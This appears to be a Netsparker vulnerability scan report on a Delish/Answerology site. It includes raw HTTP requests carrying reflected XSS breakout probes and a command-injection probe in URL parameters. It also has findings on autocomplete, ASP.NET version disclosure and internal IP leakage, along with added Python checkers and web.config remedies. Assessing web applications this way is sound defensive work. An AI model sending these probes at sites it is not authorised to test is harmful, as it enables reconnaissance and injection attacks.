query              GET   recent_questions
showEditedDialogs  GET   true
click              GET   ans_uni\

Request

GET //index.aspx?template=answer_question.ascx&question_id=2644%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0001C7)%3C%2Fscript%3E&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni%5C HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:41:40 GMT
Content-Length: 19190
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


[Response body: the same Delish page wrapper already reproduced under the Password Transmitted Over HTTP finding, differing only in the server-side comment <!-- 172.20.65.108 9/17/2011 9:41:40 AM -->; the captured excerpt ends before any reflection of the question_id value.]
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" 
type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'answer_question.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ 
segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL 
HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <..
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=login.ascx&nextTemplate='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
template GET login.ascx
nextTemplate GET '"--></style></script><script>alert(0x0002FE)</script>

Request

GET /index.aspx?template=login.ascx&nextTemplate='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002FE)%3C/script%3E HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=answer_question.ascx
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 14:19:08 GMT
Content-Length: 18549
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 10:19:08 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
[Response body truncated in the report. The remainder is the same Delish wrapper markup captured in the previous response, with one difference: the inline Answerology object in this response carries template: 'login.ascx', echoing the template parameter of the request.]
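The report marks this nextTemplate instance as possible rather than confirmed, and its captured response body is cut off before the point where the parameter would be echoed, so the evidence does not show whether the probe came back raw. The following routine is an added example, not part of the Netsparker report or of the Answerology site code; it classifies a response body you fetch yourself by how the probe from the request above is reflected. The sample bodies are constructed (the nextTemplate key in the Answerology object is assumed; the real page only shows a template key), and the entity-encoded case has the shape that ASP.NET's HttpUtility.HtmlEncode produces.

```python
"""Reflection-context check for the nextTemplate probe in the request above.

Added example, not part of the Netsparker report or the Answerology code base.
The report truncates the response body, so it does not show how the probe
came back; this routine classifies a body you fetch yourself. Sample bodies
below are constructed for the demonstration.
"""
import html
import re

# Probe from the request above (the report renders it as alert(0x0002FE)).
PROBE = "'\"--></style></script><script>netsparker(0x0002FE)</script>"
MARKER = "netsparker(0x0002FE)"

RAW = "raw"            # probe echoed verbatim: closes the style/script context, script runs
ENCODED = "encoded"    # angle brackets came back as &lt; &gt;: inert (HtmlEncode output)
FILTERED = "filtered"  # marker echoed but the tags were stripped or altered: inspect by hand
ABSENT = "absent"      # parameter value is not echoed in this response at all


def classify_reflection(body: str, probe: str = PROBE, marker: str = MARKER) -> str:
    """Return one of RAW/ENCODED/FILTERED/ABSENT for a response body."""
    # A verbatim probe, or an intact <script> wrapper around the marker, is enough to execute.
    if probe in body or f"<script>{marker}</script>" in body:
        return RAW
    # Entity-encoded angle brackets around the marker mean the echo is harmless in HTML context.
    if re.search(r"&lt;script&gt;" + re.escape(marker) + r"&lt;/script&gt;", body, re.I):
        return ENCODED
    if marker in body:
        return FILTERED
    return ABSENT


# Constructed sample bodies mimicking the inline Answerology object the page emits
# (the nextTemplate key is assumed for the demonstration).
_TEMPLATE = "<script> var Answerology = { template: 'login.ascx', nextTemplate: '%s' } </script>"
SAMPLE_RAW = _TEMPLATE % PROBE
SAMPLE_ENCODED = _TEMPLATE % html.escape(PROBE, quote=True)   # same shape as ASP.NET's encoder
SAMPLE_FILTERED = _TEMPLATE % re.sub(r"<[^>]*>", "", PROBE)    # a tag-stripping filter
SAMPLE_ABSENT = "<script> var Answerology = { template: 'login.ascx' } </script>"

if __name__ == "__main__":
    for label, body in [("raw", SAMPLE_RAW), ("encoded", SAMPLE_ENCODED),
                        ("filtered", SAMPLE_FILTERED), ("absent", SAMPLE_ABSENT)]:
        print(label, "->", classify_reflection(body))
```

Only the RAW result confirms the finding; FILTERED means the value is echoed but the filter changed it, which is worth a manual look at the exact context (a JavaScript string literal here, where a quote or backslash may matter even when angle brackets are stripped).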
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields. Note that current browsers (Chrome and Firefox among them) ignore autocomplete="off" on password fields and still offer to save them, so treat the attribute as a defence-in-depth hint rather than a guarantee; the finding matters most on shared machines.

Actions to Take

  1. See the remedy for the solution.
  2. Find all inputs that store private data and disable autocomplete on them. Fields holding data such as "Credit Card" or "CCV" values should never be cached. You can allow the application to cache usernames and remember passwords; in most cases, however, this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all stored data from a browser is fairly easy, and a number of automated tools exist for it. Where the attacker cannot dump the data, they can still browse recently visited websites and trigger the auto-complete feature to see previously entered values.
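The check behind this finding is simple to reproduce. The following is an added example, not Netsparker's code or the site's: it walks an HTML document and reports sensitive inputs (type="password", or names that look like card data) that neither the field itself nor its enclosing form marks autocomplete="off". The sample form is constructed; only the field name user.password is taken from the instance reported below, and the e-mail field name and form action are assumed.

```python
"""Scanner-style check for the Auto Complete finding above.

Added example, not Netsparker's code or the site's. It walks an HTML document
and reports sensitive fields (password inputs, or names that look like card
data) that neither the field nor its enclosing <form> marks autocomplete="off".
The sample form is constructed; only the field name user.password comes from
the report.
"""
from html.parser import HTMLParser

# Name fragments that mark a field as sensitive even when its type is not "password".
SENSITIVE_NAME_HINTS = ("password", "passwd", "pwd", "card", "cc_", "ccnum", "ccv", "cvv", "cvc")


class AutocompleteAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self._form_off = []   # stack of enclosing <form> autocomplete="off" flags
        self.findings = []    # sensitive fields the browser is allowed to cache

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form_off.append(a.get("autocomplete", "").strip().lower() == "off")
            return
        if tag != "input":
            return
        name = a.get("name") or a.get("id") or ""
        kind = a.get("type", "text").strip().lower()
        sensitive = kind == "password" or any(h in name.lower() for h in SENSITIVE_NAME_HINTS)
        if not sensitive:
            return
        field_off = a.get("autocomplete", "").strip().lower() == "off"
        form_off = self._form_off[-1] if self._form_off else False
        if not (field_off or form_off):
            self.findings.append(name or f"<unnamed {kind} input>")

    def handle_endtag(self, tag):
        if tag == "form" and self._form_off:
            self._form_off.pop()


def cacheable_sensitive_fields(document: str) -> list:
    """Return the names of sensitive inputs that lack autocomplete="off"."""
    audit = AutocompleteAudit()
    audit.feed(document)
    audit.close()
    return audit.findings


# Constructed login form in the shape the finding describes: user.password with no
# autocomplete attribute (the e-mail field and the form action are assumed).
VULNERABLE_FORM = """
<form method="post" action="/index.aspx/answers/">
  <input type="text" name="user.email">
  <input type="password" name="user.password">
  <input type="submit" value="Log in">
</form>
"""
# The remedy applied per field ...
FIXED_FIELD = VULNERABLE_FORM.replace('name="user.password"', 'name="user.password" autocomplete="off"')
# ... and the remedy applied on the form tag instead.
FIXED_FORM = VULNERABLE_FORM.replace("<form ", '<form autocomplete="off" ')

if __name__ == "__main__":
    print("vulnerable:", cacheable_sensitive_fields(VULNERABLE_FORM))
    print("field fix: ", cacheable_sensitive_fields(FIXED_FIELD))
    print("form fix:  ", cacheable_sensitive_fields(FIXED_FORM))
```

The audit tells you whether the remedy was applied, not whether a browser honours it; as noted in the remedy, current browsers ignore the attribute on password fields, so the more effective controls are on the server side (not serving the login form over plain HTTP, short session lifetimes).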

External References

- /index.aspx/answers/

/index.aspx/answers/ CONFIRMED

http://answerology.delish.com/index.aspx/answers/

Identified Field Name

user.password

Request

GET /index.aspx/answers/ HTTP/1.1
Referer: http://answerology.delish.com/index.aspx/answers/Anniversary-gift.html?popular=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:42:12 GMT
Content-Length: 31229
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 9:42:12 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
[Response body truncated in the report; the remainder is the same Delish wrapper markup captured in the earlier responses.]
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" 
type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'home.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ 
segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL 
HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('homepage');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id=&..
ASP.NET Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server discloses the ASP.NET version in its HTTP responses. The version can leak through the X-AspNet-Version response header or through the default ASP.NET error page; here it comes from the X-AspNet-Version header, which is present on every response in this report, including the 302 and 404 error responses below. This information helps an attacker develop further attacks and makes the system an easier target for automated attacks.

Impact

An attacker can use the disclosed version to look up known vulnerabilities for that exact release and combine them with other weaknesses in the application or web server. The value extracted here, 2.0.50727, identifies the .NET 2.0 runtime but not its revision, so the patch level stays unknown from the header alone; the default ASP.NET error page prints the full build number, which is why the remedy below also turns custom errors on.

Remedy

Apply the following changes to web.config: disable the X-AspNet-Version header and serve custom error pages so that the default ASP.NET error page, which prints the full framework build, is never shown. Element names in web.config are case-sensitive: the section is <system.web>, not <System.Web>. Note that enableVersionHeader only removes X-AspNet-Version. The X-Powered-By: ASP.NET and Server: Microsoft-IIS/6.0 headers in the responses below are added by IIS itself and are removed in the IIS configuration (on IIS 6, X-Powered-By is listed under Custom HTTP Headers on the site's HTTP Headers tab; the Server banner needs URLScan with RemoveServerHeader=1), not in web.config. Re-test after the change with a request for a non-existent page as well as a valid one, since error responses are where the version usually survives.
<configuration>
  <system.web>
    <!-- stop emitting the X-AspNet-Version response header -->
    <httpRuntime enableVersionHeader="false" />
    <!-- mode="On" hides the default error page from every client; RemoteOnly would still show it to local requests -->
    <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
      <error statusCode="403" redirect="~/error/Forbidden.aspx" />
      <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
      <error statusCode="500" redirect="~/error/InternalError.aspx" />
    </customErrors>
  </system.web>
</configuration>

Remedy References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- //index.aspx

//index.aspx

http://answerology.delish.com//index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetNam..

Extracted Version

2.0.50727

Request

GET //index.aspx?template=%22%26%20SET%20%2FA%200xFFF9999-2%20%26&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Location: /index.aspx?template=page_not_found.ascx&error=
Content-Type: text/html; charset=utf-8
Content-Length: 174
Date: Sat, 17 Sep 2011 13:34:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.aspx%3ftemplate%3dpage_not_found.ascx%26error%3d">here</a>.</h2>
</body></html>
[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It could not determine whether the address belongs to the web server itself or to another host on an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

